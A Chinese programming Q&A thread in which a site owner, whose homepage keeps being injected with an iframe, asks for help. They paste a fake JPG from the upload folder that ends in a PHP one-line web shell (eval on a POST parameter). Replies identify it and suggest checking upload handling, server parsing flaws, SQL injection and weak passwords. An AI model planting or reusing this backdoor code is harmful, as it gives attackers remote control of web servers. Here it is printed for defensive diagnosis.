当前位置:编程学习 > 网站相关 >>

服务器网站首页被挂码,找不到原因,请帮忙

我的服务器首页被挂码了,嵌入了iframe了,我查找了SQL注入漏洞,已经补上上了,上传功能也做了处理。但是现在还是被挂,我在客户上传目录中发现一个伪JPG图片,用记事本打开是这样的:


? JFIF  ` `   C 




   C  

  d e"            
 ?   } !1AQa"q2亼?#B绷R佯$3br?
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼?        
 ?  w !1AQaq"2?B憽绷 #3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬    ? ( ( ( ( ( ( ( ( 0h 0hv讯巌r}(6?妚O?> 蔧搭建翣?X`袬 NP;袳 .恠EH堾袿偕 *?R?伬?逘饱1趽`??鳰cp%)隝A"3?嵵 T隢e?脛入NX?Ac#NjvC奤LR煑?>^sMU趈`3淭{~j?n渊8?3G轄佋攃?
@w
埾Z)錐:S`PP症樰h?%~Jz)倥# -I:驚愓轃,€訑s譂AL?制zT ?zP"1龋t???奙??ゆ橍ス?説M謯W4P鞳蹞炘??鐵9C劓兣&})狯帣鳡苯砆伕郧玟R垤h圚隶Q蜲JW爐燙_樰)颭灁?灤Pz?姞蔍h?tQE@怲}]PX╬??=h!<袳5?見)?=i?€H?(??   <?php @eval($_POST['cike']);?>


高手见过 这是什么东西吗?是一个100*100的黑色图片,我看到最后一行是:<?php @eval($_POST['cike']);?>
现在还没找到是如何被挂的,天天被挂,高手给点思路。
--------------------编程问答--------------------
简单地说,设置程序运行权限,管好管理员账号,适当分配权限。
最好还是安装个Linux,用lighttpd+fastCGI处理php,再前置nginx,相对比windows+iis或apache安全一些。
--------------------编程问答-------------------- WIN + iis 安全性差 --------------------编程问答--------------------  <?php @eval($_POST['cike']);?> 一句话木马,相关知识自己百度吧,你看看是不是上传的地方存在漏洞,要么这个文件的扩展名是php,php3,php5之类的,如果是apache看看是不是apache的解析漏洞,如果是ngnix看看存不存在ngnix的解析漏洞,还有就是,要么前台直接上传这个文件,要么就是通过后台上传,如果通过后台上传,那么说明对方能进入你的后台,查看一下有没有SQL注入或者弱密码之类的,对了,别忘记了牛逼的社会工程学 --------------------编程问答--------------------
补充:云计算 ,  云安全
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,